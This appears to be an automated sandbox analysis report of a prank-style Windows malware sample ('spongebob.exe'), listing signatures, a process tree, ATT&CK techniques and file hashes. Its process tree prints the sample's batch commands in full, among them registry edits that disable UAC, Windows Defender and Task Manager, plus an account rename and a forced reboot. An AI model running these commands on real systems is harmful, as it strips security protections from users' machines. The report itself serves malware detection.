Analysis
- max time kernel: 31s
- max time network: 32s
- platform: windows10-2004_x64
- resource: win10v2004-20250502-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19/05/2025, 15:27
- Static task: static1
- URLScan task: urlscan1
- Behavioral task: behavioral1
- Sample: https://gofile.io/d/dmJvEk
- Resource: win10v2004-20250502-en
Errors
General
- Target: https://gofile.io/d/dmJvEk
Malware Config
Signatures
Modifies Windows Defender DisableAntiSpyware settings
description | ioc | Process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe
UAC bypass 3 TTPs 1 IoCs
description | ioc | Process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Disables Task Manager via registry modification
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
- 11 | api.gofile.io
- 16 | api.gofile.io
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description | ioc | Process
- Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | reg.exe
resource | yara_rule
- behavioral1/memory/5896-220-0x0000000000400000-0x00000000007BF000-memory.dmp | upx
- behavioral1/memory/5896-344-0x0000000000400000-0x00000000007BF000-memory.dmp | upx
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | shutdown.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | spongebob.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Modifies data under HKEY_USERS 17 IoCs
description | ioc | Process
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "19" | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
- Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
- Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921420318530982" | chrome.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Modifies registry class 1 IoCs
description | ioc | Process
- Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings | chrome.exe
Modifies registry key 1 TTPs 3 IoCs
pid | Process
- 4200 | reg.exe
- 5852 | reg.exe
- 5236 | reg.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
- 4008 | chrome.exe (2 entries)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid | Process
- 4008 | chrome.exe (5 entries)
Suspicious use of AdjustPrivilegeToken 26 IoCs
description | pid | Process
- Token: SeShutdownPrivilege | 4008 | chrome.exe (12 entries, alternating with the next row)
- Token: SeCreatePagefilePrivilege | 4008 | chrome.exe (12 entries)
- Token: SeShutdownPrivilege | 3584 | shutdown.exe
- Token: SeRemoteShutdownPrivilege | 3584 | shutdown.exe
Suspicious use of FindShellTrayWindow 38 IoCs
pid | Process
- 4008 | chrome.exe (38 entries)
Suspicious use of SendNotifyMessage 24 IoCs
pid | Process
- 4008 | chrome.exe (24 entries)
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
- 4940 | LogonUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
- PID 4008 wrote to memory of 1840 | 4008 | chrome.exe | 85 (2 entries)
- PID 4008 wrote to memory of 3960 | 4008 | chrome.exe | 86 (2 entries)
- PID 4008 wrote to memory of 1576 | 4008 | chrome.exe | 87 (2 entries)
- PID 4008 wrote to memory of 3960 | 4008 | chrome.exe | 86 (28 entries)
- PID 4008 wrote to memory of 4284 | 4008 | chrome.exe | 89 (30 entries)
Processes (child processes indented under their parent)

C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4008)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/dmJvEk
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1840)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff4366dcf8,0x7fff4366dd04,0x7fff4366dd10
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3960)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1936,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1932 /prefetch:2
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1576)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1288,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2080 /prefetch:3
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 372)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2528 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4284)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3000,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3028 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5256)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3020,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3068 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2288)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4280 /prefetch:2
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2564)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3004,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4708 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5592)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5132 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5232)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5244,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5480 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5652)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3212,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5800 /prefetch:8

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe (PID 4228)
  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Windows\system32\svchost.exe (PID 5764)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\System32\rundll32.exe (PID 4124)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Documents\Spongebob\spongebob.exe (PID 5896)
  "C:\Users\Admin\Documents\Spongebob\spongebob.exe"
  - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe (PID 3568)
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F211.tmp\SpongebobFuck.cmd""
      - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (PID 5388)
          reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
          - Sets desktop wallpaper using registry
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\rundll32.exe (PID 3456)
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (PID 4200)
          reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          - System Location Discovery: System Language Discovery
          - Modifies registry key
        C:\Windows\SysWOW64\reg.exe (PID 5852)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - UAC bypass
          - System Location Discovery: System Language Discovery
          - Modifies registry key
        C:\Windows\SysWOW64\reg.exe (PID 4144)
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          - Modifies Windows Defender DisableAntiSpyware settings
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (PID 5236)
          REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          - System Location Discovery: System Language Discovery
          - Modifies registry key
        C:\Windows\SysWOW64\net.exe (PID 3836)
          net user Admin /fullname:"SPONGEBOB WAS HERE!!!"
          - System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net1.exe (PID 4592)
              C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"
              - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\shutdown.exe (PID 3584)
          shutdown /r /t 00
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\LogonUI.exe (PID 4940)
  "LogonUI.exe" /flags:0x4 /state0:0xa397d055 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\rundll32.exe (PID 4536)
  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Create or Modify System Process (1): Windows Service (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify Tools (2)
- Modify Registry (4)
Downloads
- Filesize: 649B
  MD5: b121704ec76097bcfc05c1c466d0bf5c
  SHA1: e2dbfc6ad73c4e0536418e1dc52c865469c860be
  SHA256: 8c513e65cc29b681d895c3aab61135fe029ba3732cd2c49be73626e91a6bcde8
  SHA512: 1fadd50a54d7a8d6fe68d607d81a61ae9e4f583b2ff3aeb9c303381b0b72dcdbbed1d6a83348cbdc27cc5139ef1c4d74bbf62e07e7fbe805b587bef3de13df87
- Filesize: 192B
  MD5: fcbbdd23a80e8d3f37f9a45aac173173
  SHA1: f8d3969aebc1e5c00abacb41f5b1ea675e2e13b3
  SHA256: 49ca5edd552ce402076dad6d2e4b572105cb96bd4d074bba53440f0fa33ac47b
  SHA512: b019d78fe135216a67d3e7a44b87fa912b39aae96493c75145c4f340b035b06d1c144453fcad9c049ee178c39d5a8130b4cdc973405dc7bd221b238ce1fbf6be
- Filesize: 264KB
  MD5: f50f89a0a91564d0b8a211f8921aa7de
  SHA1: 112403a17dd69d5b9018b8cede023cb3b54eab7d
  SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
  SHA512: bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
- Filesize: 2KB
  MD5: 31e5908826a0a151f4c6b7271a944beb
  SHA1: d51828685e02ed0192247ab90a20d5b52bf34caf
  SHA256: ee68809a791f800a5c8d04eec6c993df56dd721fdb224b938390ba66a7cf9398
  SHA512: b5f980ecbf724d8b126359cfcbfaf2382fa8e36da9be6e1625fa0ba8b8ee51b381aa13f6e41168dfa1592e6cd4d15c24b786c3d6882d279b1e00e747197089c2
- Filesize: 2B
  MD5: d751713988987e9331980363e24189ce
  SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
  SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
  SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
- Filesize: 690B
  MD5: a005109f7a9aa3760277f9cb56f8f8fb
  SHA1: e9967de336b58ba7585a76547807d9f1325e07ba
  SHA256: e89c2751a6975e15483957bf44070e9f3daa35190f94b8257eac20de041e4eb6
  SHA512: 754321a31664316788455f8da7ec5de0b3ede6315962096b38d18531fd3a2cc79db5b3226cea1664b9c80872b68cf3628353b829d2addf5ab7ab00edea711580
- Filesize: 10KB
  MD5: 3f9da8e73b2f79ecf4f578f5826b4d6c
  SHA1: 877c13e852ca5d9d4844c154d0acd6146dbd1afd
  SHA256: 0a438194a4880ab05a347c82c914082e936f6a0e483a52f9366eabd338b2877e
  SHA512: 7073b916beb1144c64cf2bef6b42384fc7af55368d6daf67814c17b87c9555f560a0335d694f9db5fa1b9ece87245efa11f49973e14917f878eb5c3b9b670f01
- Filesize: 15KB
  MD5: e729efef0721795dcd37e91fefe504c8
  SHA1: e6d9aeb11858ff7af01fbacc769df6efe776441c
  SHA256: dd886131b239603bd651803f5e321850072bac71afa2c0f38ce33b6b2f9bca2c
  SHA512: 326ab39fe84c0a1d8efd371262742e83bd185359717178360e846fec312483eb826887733cdda30c9dc30c2e125efd048a8915707e91c9d83eb92c43cfbf6839
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
  Filesize: 72B
  MD5: 9d482dd4329441ab7f8c35d7fab3bc16
  SHA1: ba8c08558ac73fcf21e07e2387fb7812cb07a068
  SHA256: 09ba5a2380da4020b18e235e6033236cf102e798afee8cd59ab51ba6dbb8439a
  SHA512: 8601e2e0b12814d838c4c845e345b3a722535cceeab93237c9cdc981a87c02ebde6a30c01afba1ae11c60c7feedb523257a44abe002ba057aff605a4ccdbc5ed
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
  Filesize: 48B
  MD5: 5010e50206c1524207d3f6d9b2d904d8
  SHA1: 41ca116137529d7252e6b9b741bdad186265e22a
  SHA256: ab29fe3223b155e184c3683f296d9a19317a9f567e3f017172139ab82372932f
  SHA512: d6b577e20adad36202cf19cd4a82500fb9cad1e337c356fbadc631c63b457f67e023b9b0b9fffc1752a3e6a08f65ace233b40a48b6cbaafb30291404622a1645
- Filesize: 80KB
  MD5: bfdbe87e9b36799848922cded20b63d5
  SHA1: 9065ee0facac6b4c16b4a896b6e8abaf140b1fa9
  SHA256: ba9cc0d1ba66ca38b6f2c182e99c885e721bfcb2e59f5a0cf8f452bb013e87d3
  SHA512: a65d08848fd60785d6cad11c45116c3bb2bf064c963eb47fde5147a82dc3d902fcabed599c555083eb11ff642031e5d73edd08dbf20769fcbe91ba5a0f6779a2
- Filesize: 79KB
  MD5: 3e4a131ef62fe89c555b4467b7526a94
  SHA1: 58cd304bb2d362749e54e6f0d798d34be991dff5
  SHA256: 9a7ef4a225f013493d468fde2116402a2af6d275f39f13c5f7dfc176e82e48ab
  SHA512: 17eb603f13b3f8741cf0181ab1ebfd5156440d38ca59135e8953e9857cd03fb7d63f2e6e5a9d230cac914f459852d1f0dea5e1eb4689e503226ef04707899245
- Filesize: 80KB
  MD5: b96e8c556ddd5b4b25bc95f415897546
  SHA1: 8ce784264cb3faf19973573bd681f1dbb39ef8b1
  SHA256: 7e480f9367094cb33186d29a088136ccf576573314f436d2ded0056a23bc6016
  SHA512: 74bb912bbcf462db90d99f347ec9179b47eb4cd7453aa7e125b7a81eb2400f7c76079636c61c8a4a91bf576ae57a3ca2d09194931c40ba6c7de584c91427516b
- Filesize: 92KB
  MD5: 03d8b31db1ed1294334b872f756ad1a1
  SHA1: 3f57aa9b9efb1ad9d576d799d9306abd4befdf89
  SHA256: 7e17dcaafc07877e720b3fc0e666ac69e2dce8e7458ae9b23902bcf5f8f2a40a
  SHA512: 55a979189ead8886c5fc3f35b927a80f8dff7a1d52136305c9efee7bc4f1b151d06348e75bef5b3203c47aaed98dc73692f097f7a967c64b9b743a5402012a86
- Filesize: 11KB
  MD5: 7a918ed93f7fb297e05464edccc46756
  SHA1: 9464288fed7ba5d88928265882def5e05ffbe7db
  SHA256: 82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
  SHA512: cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1
- Filesize: 2.6MB
  MD5: ce45a70d3cc2941a147c09264fc1cda5
  SHA1: 44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
  SHA256: eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
  SHA512: d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149
- Filesize: 131B
  MD5: 8884a25e47d799f6bd3d4ec20f05a3b7
  SHA1: 8959822be4ecff5dd7fbdd714cd85775345d39c5
  SHA256: 5a68437edd63bd826a1f1557121d4c05114c608fd8a18a0c9c156a60d90bd0c1
  SHA512: 3722494fda291fe85f9276dc656b49fb977eea6403cf3a0b6bfaa77c1ec74a70c2a3012e420129f3c1fd939ef7928d94f0320a128b7087fa8f4f4080ae70973b
- Filesize: 548KB
  MD5: c1978e4080d1ec7e2edf49d6c9710045
  SHA1: b6a87a32d80f6edf889e99fb47518e69435321ed
  SHA256: c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
  SHA512: 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e
- Filesize: 7.3MB
  MD5: f0bc760a442d651bf4eb6ed08856bb18
  SHA1: f363e350b8aebbff036517ded088e177de97cb14
  SHA256: 783829dfcd09317c8916249301ecf11236d160d62b7441d812d41817d1900eb4
  SHA512: 7faf0dd31e1201cd81db11715bc2b230c6845bf608268aa3bfd087d60bc17e909dcaab9461aa1f4a20383fe89ed4025641aa546ea37edca930eff00cb514b76c
- Filesize: 38B
  MD5: 7c0b3ef9968d114404d5cb1ef66eae49
  SHA1: 78fd3c71458513f6ac905427a5d0fcf4e535ee69
  SHA256: b765f9b09b6c3d040c96e9b09eca1ed1a8bc3f980ba09beabc0a8df726181bbf
  SHA512: ce42bf92bf7ee7d905463329f5f24dbf46b39d041e386343492825eac86bdfb917babd94df21eb5fee4f0f0b205c218ac1b17c4857763d5786c3cf8b96e347c9